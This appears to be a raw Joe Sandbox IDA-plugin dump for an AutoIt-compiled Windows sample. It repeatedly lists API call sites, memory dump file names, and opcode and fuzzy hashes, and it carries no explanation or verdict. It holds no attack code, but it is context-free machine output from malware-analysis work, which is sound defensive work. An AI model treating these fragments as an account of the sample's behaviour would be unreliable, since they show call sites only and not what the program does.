                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                        • API String ID: 1510338132-1757145024
                                                                                                                        • Opcode ID: e8740eb1c398e3a5cc95d1241dc7368525a0615cab10808fff4bee21972fd3d2
                                                                                                                        • Instruction ID: 5f72bc74d4fc266e0a509b15eff0e7e740f049ceadc39095bfad8fdd75071936
                                                                                                                        • Opcode Fuzzy Hash: e8740eb1c398e3a5cc95d1241dc7368525a0615cab10808fff4bee21972fd3d2
                                                                                                                        • Instruction Fuzzy Hash: B1912B71A10219AFCF04EFA8D8919EEB7B8FF05314F14452AF416BB291DB74AA45CB70
                                                                                                                        APIs
                                                                                                                        • __getstream.LIBCMT ref: 00DB418E
                                                                                                                          • Part of subcall function 00DB889E: __getptd_noexit.LIBCMT ref: 00DB889E
                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00DB41C9
                                                                                                                        • __wopenfile.LIBCMT ref: 00DB41D9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                        • String ID: <G
                                                                                                                        • API String ID: 1820251861-2138716496
                                                                                                                        • Opcode ID: 361a0d5a3e130a70c2a8d1f53d109212548a199b9cb3b77f2cec917a26556884
                                                                                                                        • Instruction ID: 87b983d39693e8cb3050ff625e588fef06c987e85592e9e32a6e6103feab121f
                                                                                                                        • Opcode Fuzzy Hash: 361a0d5a3e130a70c2a8d1f53d109212548a199b9cb3b77f2cec917a26556884
                                                                                                                        • Instruction Fuzzy Hash: F911C670D00316EBDB11FFB89C426EF3BA4EF553A0B188525A417DB282EB74C981A771
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00DAC948,SwapMouseButtons,00000004,?), ref: 00DAC979
                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00DAC948,SwapMouseButtons,00000004,?,?,?,?,00DABF22), ref: 00DAC99A
                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,00DAC948,SwapMouseButtons,00000004,?,?,?,?,00DABF22), ref: 00DAC9BC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                        • Opcode ID: dc9cdddfe78bb776016aff172261a2d3fc2b68ba0a9fa78eac925d4ac60a63ff
                                                                                                                        • Instruction ID: 9560da828fcb710f2b792c74df554501ed723dc93be239e60c1df79306131cf3
                                                                                                                        • Opcode Fuzzy Hash: dc9cdddfe78bb776016aff172261a2d3fc2b68ba0a9fa78eac925d4ac60a63ff
                                                                                                                        • Instruction Fuzzy Hash: 1B117C76525208FFDB118F64DC44EEF77B8EF09751F00941AB841E7210E2319E449B60
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a4604657f9b063bca1ac3ca825bcd1c8b27c27c5f8b05def6d61c9404b202a60
                                                                                                                        • Instruction ID: 6e0ce85a2ef39c09bfab3c5fa37f45ca9065c6dfd14759292c26f980936824e0
                                                                                                                        • Opcode Fuzzy Hash: a4604657f9b063bca1ac3ca825bcd1c8b27c27c5f8b05def6d61c9404b202a60
                                                                                                                        • Instruction Fuzzy Hash: 7AC13A75A0021AEBCB14CFA8C984FAEB7B6FF48708F144599E905EB251D730DE41CBA1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D941A7: _fseek.LIBCMT ref: 00D941BF
                                                                                                                          • Part of subcall function 00DDCE59: _wcscmp.LIBCMT ref: 00DDCF49
                                                                                                                          • Part of subcall function 00DDCE59: _wcscmp.LIBCMT ref: 00DDCF5C
                                                                                                                        • _free.LIBCMT ref: 00DDCDC9
                                                                                                                        • _free.LIBCMT ref: 00DDCDD0
                                                                                                                        • _free.LIBCMT ref: 00DDCE3B
                                                                                                                          • Part of subcall function 00DB28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00DB8715,00000000,00DB88A3,00DB4673,?), ref: 00DB28DE
                                                                                                                          • Part of subcall function 00DB28CA: GetLastError.KERNEL32(00000000,?,00DB8715,00000000,00DB88A3,00DB4673,?), ref: 00DB28F0
                                                                                                                        • _free.LIBCMT ref: 00DDCE43
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1552873950-0
                                                                                                                        • Opcode ID: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
                                                                                                                        • Instruction ID: d5289ee738b974725c6588dc57b85e74b34bfec4949ed8af7ad667f1abc52a9f
                                                                                                                        • Opcode Fuzzy Hash: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
                                                                                                                        • Instruction Fuzzy Hash: 1A512AB1914219AFDF159F64CC81AAEBBB9EF48300F1040AEF659A3251DB715A80CF79
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00D91E87
                                                                                                                          • Part of subcall function 00D938E4: _memset.LIBCMT ref: 00D93965
                                                                                                                          • Part of subcall function 00D938E4: _wcscpy.LIBCMT ref: 00D939B5
                                                                                                                          • Part of subcall function 00D938E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D939C6
                                                                                                                        • KillTimer.USER32(?,00000001), ref: 00D91EDC
                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D91EEB
                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E04526
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1378193009-0
                                                                                                                        • Opcode ID: 9a83286211a12171f8eceb6f72a7a7167ece571c00214de63614a3712a957464
                                                                                                                        • Instruction ID: 622086f37f83c395fd2b2e22d5e4aa1efe881c343f729c2fddc855c675f137f6
                                                                                                                        • Opcode Fuzzy Hash: 9a83286211a12171f8eceb6f72a7a7167ece571c00214de63614a3712a957464
                                                                                                                        • Instruction Fuzzy Hash: D821A7F5504794AFEB329B258C55BEBBBEC9B05308F04008DE79E662C1C7745A88CB61
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00DDAEA5,?,?,00000000,00000008), ref: 00DAF282
                                                                                                                          • Part of subcall function 00DAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00DDAEA5,?,?,00000000,00000008), ref: 00DAF2A6
                                                                                                                        • gethostbyname.WS2_32(?), ref: 00DE92F0
                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00DE92FB
                                                                                                                        • _memmove.LIBCMT ref: 00DE9328
                                                                                                                        • inet_ntoa.WS2_32(?), ref: 00DE9333
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1504782959-0
                                                                                                                        • Opcode ID: 640dd83a7a9a489acbaa5acf5c85e0d89d50e8eb0c00c3851ea0a71dfc351d40
                                                                                                                        • Instruction ID: b905bdca283e892c32b5a8cbb6f2ec74a9951adc4b6a3dceceafeec9c4f03aed
                                                                                                                        • Opcode Fuzzy Hash: 640dd83a7a9a489acbaa5acf5c85e0d89d50e8eb0c00c3851ea0a71dfc351d40
                                                                                                                        • Instruction Fuzzy Hash: 8D115B36600109AFCF04FBA5CD56DEEB7B9EF04310B144065F506A72A2DB30AE04CB71
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DB45EC: __FF_MSGBANNER.LIBCMT ref: 00DB4603
                                                                                                                          • Part of subcall function 00DB45EC: __NMSG_WRITE.LIBCMT ref: 00DB460A
                                                                                                                          • Part of subcall function 00DB45EC: RtlAllocateHeap.NTDLL(01390000,00000000,00000001), ref: 00DB462F
                                                                                                                        • std::exception::exception.LIBCMT ref: 00DB013E
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00DB0153
                                                                                                                          • Part of subcall function 00DB7495: RaiseException.KERNEL32(?,?,00D9125D,00E46598,?,?,?,00DB0158,00D9125D,00E46598,?,00000001), ref: 00DB74E6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                        • String ID: bad allocation
                                                                                                                        • API String ID: 3902256705-2104205924
                                                                                                                        • Opcode ID: a325e00f465014b9e89a3a59fec6628ad2949d5282686d12ae2d7662d54a6baf
                                                                                                                        • Instruction ID: cc6676842be498ce6e432aee80f7f3516c3562a3e5c8eb7f97ac8290266f36bb
                                                                                                                        • Opcode Fuzzy Hash: a325e00f465014b9e89a3a59fec6628ad2949d5282686d12ae2d7662d54a6baf
                                                                                                                        • Instruction Fuzzy Hash: 90F0AF7510831EE7CB19EAACDC029EF7BE8EF44390F140416F907E2182DBB08A8096B5
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00D9C00E,?,?,?,?,00000010), ref: 00D9C627
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 00D9C65F
                                                                                                                        • _memmove.LIBCMT ref: 00D9C697
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3033907384-0
                                                                                                                        • Opcode ID: dc62c08e702e2669a3bef61fa906c9ebb510fffefaf58ab8248fb08b3c97feb6
                                                                                                                        • Instruction ID: 255be38f0023b589c40c6968b2b54e55808f5702179201c7f93dd45637b9b0ff
                                                                                                                        • Opcode Fuzzy Hash: dc62c08e702e2669a3bef61fa906c9ebb510fffefaf58ab8248fb08b3c97feb6
                                                                                                                        • Instruction Fuzzy Hash: 8031F7B2205201ABDB249F78DC46B5BB7D9EF44350F14952EF95BC72A0EA32E8508771
                                                                                                                        APIs
                                                                                                                        • SHGetMalloc.SHELL32(00D93C31), ref: 00D93A7D
                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00D93AD2
                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00D93A8F
                                                                                                                          • Part of subcall function 00D93B1E: _wcsncpy.LIBCMT ref: 00D93B32
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3981382179-0
                                                                                                                        • Opcode ID: 76599db4c2d6dc28819a9add2cfbbf6415334088fbc9e2b0f048e818f729e9b0
                                                                                                                        • Instruction ID: d0bc2bf8282f76dd04c8ce901f1b3fff969a9ca897143a412746b871038370eb
                                                                                                                        • Opcode Fuzzy Hash: 76599db4c2d6dc28819a9add2cfbbf6415334088fbc9e2b0f048e818f729e9b0
                                                                                                                        • Instruction Fuzzy Hash: 91214F76B00114ABCB14DF95DC84EEEB7BDEF88704B144094F50AE7251DB309E46CBA0
                                                                                                                        APIs
                                                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00DB4603
                                                                                                                          • Part of subcall function 00DB8E52: __NMSG_WRITE.LIBCMT ref: 00DB8E79
                                                                                                                          • Part of subcall function 00DB8E52: __NMSG_WRITE.LIBCMT ref: 00DB8E83
                                                                                                                        • __NMSG_WRITE.LIBCMT ref: 00DB460A
                                                                                                                          • Part of subcall function 00DB8EB2: GetModuleFileNameW.KERNEL32(00000000,00E50312,00000104,?,00000001,00DB0127), ref: 00DB8F44
                                                                                                                          • Part of subcall function 00DB8EB2: ___crtMessageBoxW.LIBCMT ref: 00DB8FF2
                                                                                                                          • Part of subcall function 00DB1D65: ___crtCorExitProcess.LIBCMT ref: 00DB1D6B
                                                                                                                          • Part of subcall function 00DB1D65: ExitProcess.KERNEL32 ref: 00DB1D74
                                                                                                                          • Part of subcall function 00DB889E: __getptd_noexit.LIBCMT ref: 00DB889E
                                                                                                                        • RtlAllocateHeap.NTDLL(01390000,00000000,00000001), ref: 00DB462F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1372826849-0
                                                                                                                        • Opcode ID: 97559ad01ee9618153f6df7a992038bb6128c94c09606dcc0100995b8496e52b
                                                                                                                        • Instruction ID: 401d35a5f3785782cdb1dc3ff6fce6ae4e4179c3d79ddc8b646b1ef61dc74f8b
                                                                                                                        • Opcode Fuzzy Hash: 97559ad01ee9618153f6df7a992038bb6128c94c09606dcc0100995b8496e52b
                                                                                                                        • Instruction Fuzzy Hash: 2A019235601301EEE624BB29AC42AEE3748EFC2762F15052AF9079B187DFB0DC40D674
                                                                                                                        APIs
                                                                                                                        • TranslateMessage.USER32(?), ref: 00D9E646
                                                                                                                        • DispatchMessageW.USER32(?), ref: 00D9E651
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D9E664
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DispatchPeekTranslate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4217535847-0
                                                                                                                        • Opcode ID: 841c0fcae32a26b0966c8571e6084ea769ba81192fec295373acd6c5ef7c9c64
                                                                                                                        • Instruction ID: 516fb4d2ebd60ae7bc20e16aaad57c39abc2aa03e6049d223ee1527442d2655a
                                                                                                                        • Opcode Fuzzy Hash: 841c0fcae32a26b0966c8571e6084ea769ba81192fec295373acd6c5ef7c9c64
                                                                                                                        • Instruction Fuzzy Hash: 71F01C726483459BDF20DBE18C45BABB3DDBB94740F584C2DF641D2080EBB4D4088B72
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CALL
                                                                                                                        • API String ID: 0-4196123274
                                                                                                                        • Opcode ID: 2681bab069787e0d6f78547d136b27a279ff513fe73a651fd8e7e7ead6ee530a
                                                                                                                        • Instruction ID: ec218616169fa5c19c3e48a2543c962ddff6f544e319eb978939df045cb49d92
                                                                                                                        • Opcode Fuzzy Hash: 2681bab069787e0d6f78547d136b27a279ff513fe73a651fd8e7e7ead6ee530a
                                                                                                                        • Instruction Fuzzy Hash: 60227F74508341CFDB28DF24C490A2ABBE1FF85304F18896DE99A9B361D775EC85CB62
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D916F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00D91751
                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D9159B
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00D91612
